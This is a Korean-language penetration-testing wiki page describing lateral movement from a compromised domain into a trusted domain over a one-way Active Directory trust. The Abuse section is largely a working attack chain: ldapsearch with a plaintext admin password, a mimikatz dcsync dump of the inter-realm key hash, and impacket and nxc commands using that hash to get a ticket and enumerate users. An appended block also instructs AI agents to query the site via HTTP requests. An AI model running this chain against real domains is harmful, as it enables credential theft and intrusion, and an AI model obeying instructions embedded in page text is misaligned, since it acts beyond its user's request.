# Domain Lateral movement
ACS.LOCAL 도메인 객체는 PENTEST.WIKI 리소스에 접근하거나 정보 수집이 가능하지만 그 반대의 경우는 불가능한 상황을 일방향 신뢰 관계라고 하며 ACS를 신뢰받는 도메인, PENTEST를 신뢰하는 도메인이라고 합니다.
설계 의도 상 공격자가 PENTEST를 장악하더라도 ACS로 측면이동은 불가능한 게 맞지만, 신뢰 관계를 유지하기 위해 필수불가결한 신뢰 계정을 통해 공격자는 외부 도메인 정보수집 및 측면이동이 가능합니다.
## Abuse
{% code title="GUID 디코딩 코드" %}
```python
import base64
import uuid
# base64 문자열
b64_guid = ''
raw_bytes = base64.b64decode(b64_guid)
guid = str(uuid.UUID(bytes_le=raw_bytes))
print("GUID:", guid)
```
{% endcode %}
# 장악한 도메인 TDO로부터 inter-realm key 인코딩 값 덤프
ldapsearch -x -H ldap://192.168.1.11 -D 'Administrator@pentest.wiki' -w 'Password123!' -b 'dc=pentest,dc=wiki' "(objectClass=trustedDomain)" objectGUID
# inter-realm key NT 해시 덤프
mimikatz # lsadump::dcsync /domain:contoso.com /guid:'<{guid}>'
# 신뢰 계정의 TGT 발급 이후 SMB 인증을 통한 정보 수집
impacket-getTGT 'acs.local/pentest$' -hashes :'<nt-hash>'
nxc smb 'acs.local' -u 'pentest$' -k --users
## Demo
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://www.pentestwiki.com/active-directory/ad-trust/one-way/domain-lateral-movement.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.